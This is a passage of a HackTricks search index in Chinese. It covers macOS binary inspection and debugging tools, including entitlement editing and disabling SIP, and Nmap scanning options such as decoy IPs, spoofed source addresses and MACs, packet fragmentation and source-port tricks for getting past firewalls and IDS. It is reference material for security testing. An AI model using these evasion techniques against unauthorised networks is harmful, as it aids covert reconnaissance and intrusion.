通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » macOS 应用 - 检查、调试和模糊测试","id":"2028","title":"macOS 应用 - 检查、调试和模糊测试"},"2029":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 静态分析","id":"2029","title":"静态分析"},"203":{"body":",: 直接指示 IP -iL : list_IPs -iR : 随机 IP 的数量,可以使用 --exclude 或 --excludefile 排除可能的 IP。","breadcrumbs":"Pentesting Network » Nmap Summary (ESP) » 要扫描的 IP","id":"203","title":"要扫描的 IP"},"2030":{"body":"bash otool -L /bin/ls #List dynamically linked libraries\\notool -tv /bin/ps #Decompile application bash objdump -m --dylibs-used /bin/ls #List dynamically linked libraries\\nobjdump -m -h /bin/ls # Get headers information\\nobjdump -m --syms /bin/ls # Check if the symbol table exists to get function names\\nobjdump -m --full-contents /bin/ls # Dump every section\\nobjdump -d /bin/ls # Dissasemble the binary\\nobjdump --disassemble-symbols=_hello --x86-asm-syntax=intel toolsdemo #Disassemble a function using intel flavour bash nm -m ./tccd # List of symbols","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » otool & objdump & nm","id":"2030","title":"otool & objdump & nm"},"2031":{"body":"您可以 从这里下载 disarm 。 bash ARCH=arm64e disarm -c -i -I --signature /path/bin # Get bin info and signature\\nARCH=arm64e disarm -c -l /path/bin # Get binary sections\\nARCH=arm64e disarm -c -L /path/bin # Get binary commands (dependencies included)\\nARCH=arm64e disarm -c -S /path/bin # Get symbols (func names, strings...)\\nARCH=arm64e disarm -c -d /path/bin # Get disasembled\\njtool2 -d __DATA.__const myipc_server | grep MIG # Get MIG info 您可以 在这里下载 jtool2 或使用 brew 安装它。 bash # Install\\nbrew install --cask jtool2 jtool2 -l /bin/ls # Get commands (headers)\\njtool2 -L /bin/ls # Get libraries\\njtool2 -S /bin/ls # Get symbol info\\njtool2 -d 
/bin/ls # Dump binary\\njtool2 -D /bin/ls # Decompile binary # Get signature information\\nARCH=x86_64 jtool2 --sig /System/Applications/Automator.app/Contents/MacOS/Automator # Get MIG information\\njtool2 -d __DATA.__const myipc_server | grep MIG [!CAUTION] > jtool 已被 disarm 取代","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » jtool2 & Disarm","id":"2031","title":"jtool2 & Disarm"},"2032":{"body":"[!TIP] > Codesign 可以在 macOS 中找到,而 ldid 可以在 iOS 中找到 bash # Get signer\\ncodesign -vv -d /bin/ls 2>&1 | grep -E \\"Authority|TeamIdentifier\\" # Check if the app’s contents have been modified\\ncodesign --verify --verbose /Applications/Safari.app # Get entitlements from the binary\\ncodesign -d --entitlements :- /System/Applications/Automator.app # Check the TCC perms # Check if the signature is valid\\nspctl --assess --verbose /Applications/Safari.app # Sign a binary\\ncodesign -s toolsdemo # Get signature info\\nldid -h # Get entitlements\\nldid -e # Change entilements\\n## /tmp/entl.xml is a XML file with the new entitlements to add\\nldid -S/tmp/entl.xml ","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 代码签名 / ldid","id":"2032","title":"代码签名 / ldid"},"2033":{"body":"SuspiciousPackage 是一个有用的工具,可以在安装之前检查 .pkg 文件(安装程序)并查看其内容。 这些安装程序通常具有 preinstall 和 postinstall bash 脚本,恶意软件作者通常利用这些脚本来 持久化 恶意软件 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » SuspiciousPackage","id":"2033","title":"SuspiciousPackage"},"2034":{"body":"此工具允许 挂载 Apple 磁盘映像 ( .dmg ) 文件,以便在运行任何内容之前进行检查: bash hdiutil attach ~/Downloads/Firefox\\\\ 58.0.2.dmg 它将被挂载在 /Volumes","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » hdiutil","id":"2034","title":"hdiutil"},"2035":{"body":"检查高熵 检查字符串(几乎没有可理解的字符串,已打包) MacOS 的 UPX 打包器生成一个名为 \\"__XHDR\\" 的部分","breadcrumbs":"macOS Security & Privilege 
Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 打包的二进制文件","id":"2035","title":"打包的二进制文件"},"2036":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 静态 Objective-C 分析","id":"2036","title":"静态 Objective-C 分析"},"2037":{"body":"caution 请注意,用 Objective-C 编写的程序在编译成 Mach-O 二进制文件 时 保留 其类声明。这些类声明 包括 : 定义的接口 接口方法 接口实例变量 定义的协议 请注意,这些名称可能会被混淆,以使二进制文件的逆向工程更加困难。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 元数据","id":"2037","title":"元数据"},"2038":{"body":"当在使用 Objective-C 的二进制文件中调用一个函数时,编译后的代码不会直接调用该函数,而是会调用 objc_msgSend 。这将调用最终的函数: 该函数期望的参数为: 第一个参数 ( self ) 是 \\"指向 接收消息的类实例的指针 \\"。更简单地说,它是正在调用该方法的对象。如果该方法是类方法,则这是类对象的一个实例(作为整体),而对于实例方法,self 将指向类的一个实例化对象。 第二个参数 ( op ) 是 \\"处理消息的方法的选择器\\"。同样,更简单地说,这只是 方法的名称 。 剩余的参数是方法所需的任何 值 (op)。 请参见如何在此页面中 使用 lldb 在 ARM64 中轻松获取此信息 : Introduction to ARM64v8 x64: 参数 寄存器 (对于) objc_msgSend 第一个参数 rdi self: 正在调用该方法的对象 第二个参数 rsi op: 方法的名称 第三个参数 rdx 方法的第一个参数 第四个参数 rcx 方法的第二个参数 第五个参数 r8 方法的第三个参数 第六个参数 r9 方法的第四个参数 第七个及以上参数 rsp+(在栈上) 方法的第五个及以上参数","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 函数调用","id":"2038","title":"函数调用"},"2039":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 转储 ObjectiveC 元数据","id":"2039","title":"转储 ObjectiveC 元数据"},"204":{"body":"默认情况下,Nmap 启动一个发现阶段,包括:-PA80 -PS443 -PE -PP -sL : 这不是侵入性的,它列出目标并发出 DNS 请求以解析名称。它有助于了解例如 www.prueba.es/24 所有 IP 是否都是我们的目标。 -Pn : 不 ping 。如果你知道它们都是活动的,这很有用(如果不是,你可能会浪费很多时间,但这个选项也会产生错误的负面结果,表示它们不活跃),它会阻止发现阶段。 -sn : 不端口扫描 。完成侦察阶段后,不扫描端口。它相对隐蔽,并允许小规模网络扫描。具有权限时,它向 80 发送 ACK (-PA),向 443 发送 SYN(-PS) 和回声请求以及时间戳请求,若没有权限则始终完成连接。如果目标是网络,它仅使用 ARP(-PR)。如果与其他选项一起使用,则仅丢弃其他选项的数据包。 -PR : Ping ARP 。在分析我们网络中的计算机时默认使用,它比使用 ping 更快。如果不想使用 ARP 数据包,请使用 --send-ip。 -PS : 向端口发送 SYN 数据包,如果回应 SYN/ACK 则表示开放(回应 RST 以避免结束连接),如果回应 RST 则表示关闭,如果没有回应则表示不可达。如果没有权限,则自动使用完全连接。如果未给出端口,则默认为 
80。 -PA : 与前一个相似,但使用 ACK,结合使用可以获得更好的结果。 -PU : 目标相反,发送到预期关闭的端口。一些防火墙仅检查 TCP 连接。如果关闭,则回应端口不可达,如果回应其他 ICMP 或没有回应,则视为目标不可达。 -PE, -PP, -PM : ICMP PINGS: 回声回复、时间戳和地址掩码。它们被发出以确定目标是否活跃。 -PY : 默认向 80 发送 SCTP INIT 探测,回应可以是 INIT-ACK(开放)、ABORT(关闭)或无回应或 ICMP 不可达(不活跃)。 -PO : 在报头中指示协议,默认 1(ICMP)、2(IGMP)和 4(封装 IP)。对于 ICMP、IGMP、TCP(6)和 UDP(17)协议,发送协议报头,对于其他协议仅发送 IP 报头。这样做的目的是由于报头的畸形,回应协议不可达或同协议的回应,以了解其是否活跃。 -n : 不使用 DNS -R : 始终使用 DNS","breadcrumbs":"Pentesting Network » Nmap Summary (ESP) » 设备发现","id":"204","title":"设备发现"},"2040":{"body":"Dynadump 是一个用于类转储 Objective-C 二进制文件的工具。GitHub 指定了 dylibs,但这也适用于可执行文件。 bash ./dynadump dump /path/to/bin 在撰写时,这是 目前效果最好的 。 常规工具 bash nm --dyldinfo-only /path/to/bin\\notool -ov /path/to/bin\\nobjdump --macho --objc-meta-data /path/to/bin class-dump class-dump 是一个原始工具,用于生成 ObjetiveC 格式代码中的类、类别和协议的声明。 它已经很旧且未维护,因此可能无法正常工作。 ICDump iCDump 是一个现代的跨平台 Objective-C 类转储工具。与现有工具相比,iCDump 可以独立于 Apple 生态系统运行,并且它提供了 Python 绑定。 python import icdump\\nmetadata = icdump.objc.parse(\\"/path/to/bin\\") print(metadata.to_decl())","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Dynadump","id":"2040","title":"Dynadump"},"2041":{"body":"对于 Swift 二进制文件,由于与 Objective-C 的兼容性,有时可以使用 class-dump 提取声明,但并不总是如此。 使用 jtool -l 或 otool -l 命令行,可以找到多个以 __swift5 前缀开头的部分: bash jtool2 -l /Applications/Stocks.app/Contents/MacOS/Stocks\\nLC 00: LC_SEGMENT_64 Mem: 0x000000000-0x100000000 __PAGEZERO\\nLC 01: LC_SEGMENT_64 Mem: 0x100000000-0x100028000 __TEXT\\n[...]\\nMem: 0x100026630-0x100026d54 __TEXT.__swift5_typeref\\nMem: 0x100026d60-0x100027061 __TEXT.__swift5_reflstr\\nMem: 0x100027064-0x1000274cc __TEXT.__swift5_fieldmd\\nMem: 0x1000274cc-0x100027608 __TEXT.__swift5_capture\\n[...] 
您可以在 此博客文章中找到有关这些部分存储的信息 。 此外, Swift 二进制文件可能包含符号 (例如,库需要存储符号以便可以调用其函数)。 符号通常以丑陋的方式包含有关函数名称和属性的信息 ,因此它们非常有用,并且有“ 去混淆器 ”可以获取原始名称: bash # Ghidra plugin\\nhttps://github.com/ghidraninja/ghidra_scripts/blob/master/swift_demangler.py # Swift cli\\nswift demangle","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 静态 Swift 分析","id":"2041","title":"静态 Swift 分析"},"2042":{"body":"warning 请注意,为了调试二进制文件, 需要禁用 SIP (csrutil disable 或 csrutil enable --without debug),或者将二进制文件复制到临时文件夹并 移除签名 (使用 codesign --remove-signature ),或者允许调试该二进制文件(您可以使用 this script )。 warning 请注意,为了在 macOS 上 插桩系统二进制文件 (例如 cloudconfigurationd), 必须禁用 SIP (仅移除签名是无效的)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 动态分析","id":"2042","title":"动态分析"},"2043":{"body":"macOS 暴露了一些有趣的 API,提供有关进程的信息: proc_info:这是主要的 API,提供有关每个进程的大量信息。您需要是 root 用户才能获取其他进程的信息,但不需要特殊的权限或 mach 端口。 libsysmon.dylib:它允许通过 XPC 暴露的函数获取有关进程的信息,但需要具有 com.apple.sysmond.client 权限。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » APIs","id":"2043","title":"APIs"},"2044":{"body":"Stackshotting 是一种用于捕获进程状态的技术,包括所有运行线程的调用栈。这对于调试、性能分析以及理解系统在特定时间点的行为特别有用。在 iOS 和 macOS 上,可以使用多种工具和方法进行 stackshotting,例如工具 sample 和 spindump 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Stackshot & microstackshots","id":"2044","title":"Stackshot & microstackshots"},"2045":{"body":"该工具(/usr/bini/ysdiagnose)基本上从您的计算机收集大量信息,执行数十个不同的命令,例如 ps、zprint... 
它必须以 root 身份运行,守护进程 /usr/libexec/sysdiagnosed 具有非常有趣的权限,例如 com.apple.system-task-ports 和 get-task-allow。 其 plist 位于 /System/Library/LaunchDaemons/com.apple.sysdiagnose.plist,声明了 3 个 MachServices: com.apple.sysdiagnose.CacheDelete:删除 /var/rmp 中的旧档案 com.apple.sysdiagnose.kernel.ipc:特殊端口 23(内核) com.apple.sysdiagnose.service.xpc:通过 Libsysdiagnose Obj-C 类的用户模式接口。可以在字典中传递三个参数(compress、display、run)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Sysdiagnose","id":"2045","title":"Sysdiagnose"},"2046":{"body":"MacOS 生成大量日志,这在运行应用程序时尝试理解 它在做什么 时非常有用。 此外,有一些日志将包含标签 以 隐藏 某些 用户 或 计算机 的 可识别 信息。然而,可以 安装证书以披露此信息 。请按照 这里 的说明进行操作。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 统一日志","id":"2046","title":"统一日志"},"2047":{"body":"左侧面板 在 Hopper 的左侧面板中,可以看到二进制文件的符号( Labels )、过程和函数的列表( Proc )以及字符串( Str )。这些并不是所有字符串,而是定义在 Mac-O 文件的多个部分中的字符串(如 cstring 或 objc_methname)。 中间面板 在中间面板中,您可以看到 反汇编代码 。您可以查看 原始 反汇编、 图形 、 反编译 和 二进制 ,通过点击相应的图标: 右键单击代码对象,您可以查看 对该对象的引用 或甚至更改其名称(这在反编译的伪代码中无效): 此外,在 中间下方,您可以编写 Python 命令 。 右侧面板 在右侧面板中,您可以看到有趣的信息,例如 导航历史 (以便您知道如何到达当前情况)、 调用图 ,您可以看到所有 调用此函数的函数 以及所有 此函数调用的函数 ,以及 局部变量 信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Hopper","id":"2047","title":"Hopper"},"2048":{"body":"它允许用户以极低的 级别 访问应用程序,并提供了一种方法,让用户 跟踪 程序 ,甚至更改其执行流程。Dtrace 使用 探针 ,这些探针 分布在内核中 ,位于系统调用的开始和结束位置。 DTrace 使用 dtrace_probe_create 函数为每个系统调用创建一个探针。这些探针可以在 每个系统调用的入口和出口点 触发。与 DTrace 的交互通过 /dev/dtrace 进行,该接口仅对 root 用户可用。 tip 要在不完全禁用 SIP 保护的情况下启用 Dtrace,您可以在恢复模式下执行:csrutil enable --without dtrace 您还可以使用您 编译的 dtrace 或 dtruss 二进制文件。 可以通过以下命令获取 dtrace 的可用探针: bash dtrace -l | head\\nID PROVIDER MODULE FUNCTION NAME\\n1 dtrace BEGIN\\n2 dtrace END\\n3 dtrace ERROR\\n43 profile profile-97\\n44 profile profile-199 探针名称由四个部分组成:提供者、模块、函数和名称(fbt:mach_kernel:ptrace:entry)。如果您未指定名称的某个部分,Dtrace 将将该部分应用为通配符。 要配置 DTrace 以激活探针并指定触发时要执行的操作,我们需要使用 D 语言。 
更详细的解释和更多示例可以在 https://illumos.org/books/dtrace/chp-intro.html 中找到。 示例 运行 man -k dtrace 列出 可用的 DTrace 脚本 。示例:sudo dtruss -n binary bash #Count the number of syscalls of each running process\\nsudo dtrace -n \'syscall:::entry {@[execname] = count()}\' 脚本 bash syscall:::entry\\n/pid == $1/\\n{\\n} #Log every syscall of a PID\\nsudo dtrace -s script.d 1234 bash syscall::open:entry\\n{\\nprintf(\\"%s(%s)\\", probefunc, copyinstr(arg0));\\n}\\nsyscall::close:entry\\n{\\nprintf(\\"%s(%d)\\\\n\\", probefunc, arg0);\\n} #Log files opened and closed by a process\\nsudo dtrace -s b.d -c \\"cat /etc/hosts\\" bash syscall:::entry\\n{\\n;\\n}\\nsyscall:::return\\n{\\nprintf(\\"=%d\\\\n\\", arg1);\\n} #Log sys calls with values\\nsudo dtrace -s syscalls_info.d -c \\"cat /etc/hosts\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » dtrace","id":"2048","title":"dtrace"},"2049":{"body":"bash dtruss -c ls #Get syscalls of ls\\ndtruss -c -p 1000 #get syscalls of PID 1000","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » dtruss","id":"2049","title":"dtruss"},"205":{"body":"-sS : 不完成连接,因此不会留下痕迹,如果可以使用,非常好。(需要权限)这是默认使用的。 -sT : 完成连接,因此会留下痕迹,但可以确保使用。默认情况下没有权限。 -sU : 较慢,针对 UDP。主要是:DNS(53)、SNMP(161,162)、DHCP(67 和 68),(-sU53,161,162,67,68):开放(回应)、关闭(端口不可达)、过滤(其他 ICMP)、开放/过滤(无回应)。在开放/过滤的情况下,-sV 发送大量请求以检测 nmap 支持的任何版本,并可以检测真实状态。这样会大大增加时间。 -sY : SCTP 协议未能建立连接,因此没有日志,工作方式类似于 -PY -sN,-sX,-sF: Null、Fin、Xmas,可以穿透某些防火墙并提取信息。它们基于标准合规机器应对所有没有 SYN、RST 或 ACK 的请求回应 RST 的事实,延迟:开放/过滤(无回应)、关闭(RST)、过滤(ICMP 不可达)。在 Windows、Cisco、BSDI 和 OS/400 上不可靠。在 Unix 上是可以的。 -sM : Maimon 扫描:发送 FIN 和 ACK 标志,适用于 BSD,目前将所有返回为关闭。 -sA, sW : ACK 和窗口,用于检测防火墙,以了解端口是否被过滤。-sW 确实区分开放/关闭,因为开放的回应具有不同的窗口值:开放(RST 窗口不为 0)、关闭(RST 窗口 = 0)、过滤(ICMP 不可达或无回应)。并非所有计算机都以这种方式工作,因此如果全部关闭,则不工作;如果有几个开放,则工作正常;如果有很多开放和少量关闭,则工作方式相反。 -sI: Idle 扫描。对于存在活动防火墙但我们知道它不过滤特定 IP 的情况(或当我们只是想要匿名时),可以使用僵尸扫描器(适用于所有端口),要查找可能的僵尸,可以使用脚本 ipidseq 或利用辅助扫描器 
auxiliary/scanner/ip/ipidseq。该扫描器基于 IP 数据包的 IPID 编号。 --badsum: 发送错误的和,计算机会丢弃数据包,但防火墙可能会回应某些内容,用于检测防火墙。 -sZ: \\"奇怪\\"的 SCTP 扫描器,当发送带有 cookie 回声片段的探测时,如果开放则应被丢弃,如果关闭则应回应 ABORT。它可以穿透 init 无法穿透的防火墙,坏处是它无法区分过滤和开放。 -sO: 协议 IP 扫描。发送错误和空报头,有时甚至无法区分协议。如果 ICMP 不可达协议到达,则表示关闭;如果不可达端口到达,则表示开放;如果到达其他错误,则表示过滤;如果没有到达,则表示开放|过滤。 -b : FTPhost--> 用于从另一台主机扫描主机,通过连接另一台机器的 ftp 并请求其将文件发送到要从另一台机器扫描的端口,根据回应我们将知道它们是否开放。 [:@][:]几乎所有 ftps 服务器不再允许这样做,因此实用性不大。","breadcrumbs":"Pentesting Network » Nmap Summary (ESP) » 端口扫描技术","id":"205","title":"端口扫描技术"},"2050":{"body":"它是一个内核跟踪工具。文档代码可以在 /usr/share/misc/trace.codes 中找到。 像 latency、sc_usage、fs_usage 和 trace 这样的工具在内部使用它。 要与 kdebug 进行接口,使用 sysctl 通过 kern.kdebug 命名空间,使用的 MIB 可以在 sys/sysctl.h 中找到,相关函数在 bsd/kern/kdebug.c 中实现。 要与 kdebug 进行交互,通常步骤如下: 使用 KERN_KDSETREMOVE 移除现有设置 使用 KERN_KDSETBUF 和 KERN_KDSETUP 设置跟踪 使用 KERN_KDGETBUF 获取缓冲区条目数量 使用 KERN_KDPINDEX 从跟踪中获取自己的客户端 使用 KERN_KDENABLE 启用跟踪 调用 KERN_KDREADTR 读取缓冲区 要将每个线程与其进程匹配,调用 KERN_KDTHRMAP。 为了获取这些信息,可以使用 Apple 工具 trace 或自定义工具 kDebugView (kdv) 。 注意,Kdebug 仅对一个客户可用。 因此,只有一个 k-debug 驱动的工具可以同时执行。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » kdebug","id":"2050","title":"kdebug"},"2051":{"body":"ktrace_* API 来自 libktrace.dylib,它封装了 Kdebug 的 API。然后,客户端可以直接调用 ktrace_session_create 和 ktrace_events_[single/class] 在特定代码上设置回调,然后使用 ktrace_start 启动它。 即使在 SIP 激活 的情况下也可以使用这个。 您可以使用实用程序 ktrace 作为客户端: bash ktrace trace -s -S -t c -c ls | grep \\"ls(\\" Or tailspin.","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » ktrace","id":"2051","title":"ktrace"},"2052":{"body":"这用于进行内核级别的性能分析,使用 Kdebug 调用构建。 基本上,检查全局变量 kernel_debug_active,如果设置了它,则调用 kperf_kdebug_handler,并传入 Kdebug 代码和调用的内核帧地址。如果 Kdebug 代码与所选的匹配,则获取配置为位图的“操作”(查看 osfmk/kperf/action.h 以获取选项)。 Kperf 还有一个 sysctl MIB 表: (作为 root) sysctl kperf。这些代码可以在 osfmk/kperf/kperfbsd.c 中找到。 此外,Kperf 的一部分功能位于 kpc 中,提供有关机器性能计数器的信息。","breadcrumbs":"macOS Security & 
Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » kperf","id":"2052","title":"kperf"},"2053":{"body":"ProcessMonitor 是一个非常有用的工具,用于检查进程相关的操作(例如,监视一个进程正在创建哪些新进程)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » ProcessMonitor","id":"2053","title":"ProcessMonitor"},"2054":{"body":"SpriteTree 是一个打印进程之间关系的工具。 您需要使用类似 sudo eslogger fork exec rename create > cap.json 的命令监视您的 Mac(启动此终端需要 FDA)。然后,您可以在此工具中加载 json 以查看所有关系:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » SpriteTree","id":"2054","title":"SpriteTree"},"2055":{"body":"FileMonitor 允许监视文件事件(例如创建、修改和删除),提供有关这些事件的详细信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » FileMonitor","id":"2055","title":"FileMonitor"},"2056":{"body":"Crescendo 是一个 GUI 工具,外观和感觉与 Windows 用户可能熟悉的 Microsoft Sysinternal 的 Procmon 相似。此工具允许开始和停止各种事件类型的记录,允许按文件、进程、网络等类别过滤这些事件,并提供以 json 格式保存记录事件的功能。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Crescendo","id":"2056","title":"Crescendo"},"2057":{"body":"Apple Instruments 是 Xcode 开发工具的一部分 – 用于监视应用程序性能、识别内存泄漏和跟踪文件系统活动。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Apple Instruments","id":"2057","title":"Apple Instruments"},"2058":{"body":"允许跟踪进程执行的操作: bash fs_usage -w -f filesys ls #This tracks filesystem actions of proccess names containing ls\\nfs_usage -w -f network curl #This tracks network actions","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » fs_usage","id":"2058","title":"fs_usage"},"2059":{"body":"Taskexplorer 是一个有用的工具,可以查看二进制文件使用的 libraries 、它正在使用的 files 和 network 连接。 它还会检查二进制进程与 virustotal 的对比,并显示有关该二进制文件的信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 
TaskExplorer","id":"2059","title":"TaskExplorer"},"206":{"body":"-p: 用于指定要扫描的端口。要选择所有 65,335 个端口: -p- 或 -p all 。Nmap 有一个基于流行度的内部分类。默认情况下,它使用前 1000 个端口。使用 -F (快速扫描)分析前 100 个。使用 --top-ports 分析该数量的前端口(从 1 到 65,335)。它以随机顺序检查端口;要防止这种情况,请使用 -r 。我们还可以选择特定端口:20-30,80,443,1024-(后者表示从 1024 开始查找)。我们还可以按协议对端口进行分组:U:53,T:21-25,80,139,S:9。我们还可以选择 Nmap 流行端口中的范围:-p [-1024] 分析到 1024 端口的所有端口,这些端口包含在 nmap-services 中。 --port-ratio 分析在 0 到 1 之间的比率内最常见的端口。 -sV 版本扫描,强度可以从 0 调整到 9,默认是 7。 --version-intensity 我们调节强度,越低只会发出最可能的探测,但不是全部。这样可以大大缩短 UDP 扫描时间。 -O 操作系统检测。 --osscan-limit 为了正确扫描主机,至少需要一个开放端口和一个关闭端口。如果未满足此条件且我们设置了此选项,则不会尝试 OS 预测(节省时间)。 --osscan-guess 当操作系统检测不完美时,这会使其更加努力。 脚本 --script | | | [,...] 要使用默认脚本,请使用 -sC 或 --script=default。 可用类型有:auth、broadcast、default、discovery、dos、exploit、external、fuzzer、intrusive、malware、safe、version 和 vuln。 Auth: 执行所有可用的身份验证脚本。 Default: 执行基本的默认工具脚本。 Discovery: 从目标或受害者处检索信息。 External: 使用外部资源的脚本。 Intrusive: 使用被认为对受害者或目标具有侵入性的脚本。 Malware: 检查恶意代码或后门打开的连接。 Safe: 执行非侵入性脚本。 Vuln: 发现最常见的漏洞。 All: 执行所有可用的 NSE 扩展脚本。 要搜索脚本: nmap --script-help=\\"http-*\\" -> 以 http- 开头的那些 nmap --script-help=\\"not intrusive\\" -> 除了那些 nmap --script-help=\\"default or safe\\" -> 其中任何一个或两个的那些 nmap --script-help=\\"default and safe\\" --> 两者都有的那些 nmap --script-help=\\"(default or safe or intrusive) and not http-*\\" --script-args = , ={ = }, ={ , } --script-args-file --script-help | | | |all[,...] 
--script-trace ---> 提供有关脚本进展的信息。 --script-updatedb 要使用脚本,只需输入: nmap --script Script_Name target --> 使用脚本时,脚本和扫描器都会执行,因此也可以添加扫描器选项。我们可以添加 \\"safe=1\\" 以仅执行安全的脚本。 时间控制 Nmap 可以修改时间为秒、分钟、毫秒: --host-timeout 参数 900000ms、900、900s 和 15m 都是相同的。 Nmap 将要扫描的主机总数分成组,并以块的方式分析这些组,因此在所有主机都被分析之前不会移动到下一个块(用户在块分析完成之前不会收到任何更新)。这样,Nmap 使用大组更为优化。默认情况下,在 C 类中,它使用 256。 这可以通过 --min-hostgroup ; --max-hostgroup (调整并行扫描组大小)来更改。 您可以控制并行扫描器的数量,但最好不要这样做(Nmap 已根据网络状态自动控制): --min-parallelism ; --max-parallelism 。 我们可以修改 RTT 超时,但通常没有必要: --min-rtt-timeout , --max-rtt-timeout , --initial-rtt-timeout 。 我们可以修改尝试次数: --max-retries 。 我们可以修改主机的扫描时间: --host-timeout 。 我们可以修改每次测试之间的时间以减慢速度: --scan-delay ; --max-scan-delay 。 我们可以修改每秒的数据包数量: --min-rate ; --max-rate 。 许多端口在被过滤或关闭时响应时间较长。如果我们只对开放端口感兴趣,可以通过以下方式加快速度: --defeat-rst-ratelimit 。 要定义 Nmap 的攻击性:-T paranoid|sneaky|polite|normal|aggressive|insane。 -T (0-1) -T0 --> 仅扫描 1 个端口,并在下一个端口之前等待 5 分钟。 -T1 和 T2 --> 非常相似,但在每次测试之间仅等待 15 和 0.4 秒。 -T3 --> 默认操作,包括并行扫描。 -T4 --> --max-rtt-timeout 1250ms --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --max-retries 6 --max-scan-delay 10ms。 -T5 --> --max-rtt-timeout 300ms --min-rtt-timeout 50ms --initial-rtt-timeout 250ms --max-retries 2 --host-timeout 15m --max-scan-delay 5ms。 防火墙/IDS 它们不允许访问端口并分析数据包。 -f 用于分割数据包,默认将其分割为 8 字节,位于报头之后,要指定该大小,我们使用 ..mtu(使用此选项时,不要使用 -f),偏移量必须是 8 的倍数。 版本扫描器和脚本不支持分片 。 -D decoy1,decoy2,ME Nmap 发送扫描器,但使用其他 IP 地址作为来源,这样可以隐藏你。如果在列表中放入 ME,Nmap 会将你放在那里,最好在你之前放 5 或 6 个以完全掩盖你。可以使用 RND: 生成随机 IP。生成 个随机 IP。它们在没有连接的 TCP 版本检测器中不起作用。如果你在网络内部,使用活动 IP 会更有利,因为否则很容易发现你是唯一的活动者。 要使用随机 IP:nmap -D RND:10 Target_IP。 -S IP 当 Nmap 无法捕获你的 IP 地址时,你必须使用此选项提供它。也用于让他们认为另一个目标正在扫描他们。 -e 用于选择接口。 许多管理员为所有内容开放入口端口,以便一切正常工作,这比寻找其他解决方案更容易。这些可以是 DNS 端口或 FTP 端口...要找到此漏洞,Nmap 包含: --source-port ;-g 它们是等效的 。 --data 发送十六进制文本:--data 0xdeadbeef 和 --data \\\\xCA\\\\xFE\\\\x09。 --data-string 发送普通文本:--data-string \\"由安全操作进行的扫描,分机 7192\\"。 --data-length Nmap 仅发送报头,通过此选项我们可以添加更多字节(将随机生成)。 要完全配置 IP 数据包,请使用 --ip-options 。 如果希望查看发送和接收的数据包中的选项,请指定 
--packet-trace。有关使用 IP 选项与 Nmap 的更多信息和示例,请参见 http://seclists.org/nmap-dev/2006/q3/52 。 --ttl 。 --randomize-hosts 使攻击不那么明显。 --spoof-mac 更改 MAC 示例:Apple、0、01:02:03:04:05:06、deadbeefcafe、0020F2 和 Cisco。 --proxies 使用代理,有时代理不会保持与 Nmap 想要的那么多开放连接,因此需要修改并行性:--max-parallelism。 -sP 通过 ARP 发现我们网络中的主机。 许多管理员创建防火墙规则,允许来自特定端口的所有数据包通过(如 20、53 和 67),我们可以告诉 Nmap 从这些端口发送我们的数据包: nmap --source-port 53 IP 。 输出 -oN file 正常输出。 -oX file XML 输出。 -oS file 脚本小子输出。 -oG file 可抓取输出。 -oA file 除 -oS 外的所有输出。 -v level 详细程度。 -d level 调试。 --reason 主机和状态的原因。 --stats-every time 每次告诉我们进展如何。 --packet-trace 查看哪些数据包出去,可以指定过滤器,如:--version-trace 或 --script-trace。 --open 显示开放、开放|过滤和未过滤。 --resume file 输出摘要。 其他 -6 允许 IPv6。 -A 等同于 -O -sV -sC --traceroute。 运行时 在 Nmap 运行时,我们可以更改选项: v / V 增加 / 减少详细程度。 d / D 增加 / 减少调试级别。 p / P 开启 / 关闭数据包跟踪。 ? 打印运行时交互帮助屏幕。 Vulscan Nmap 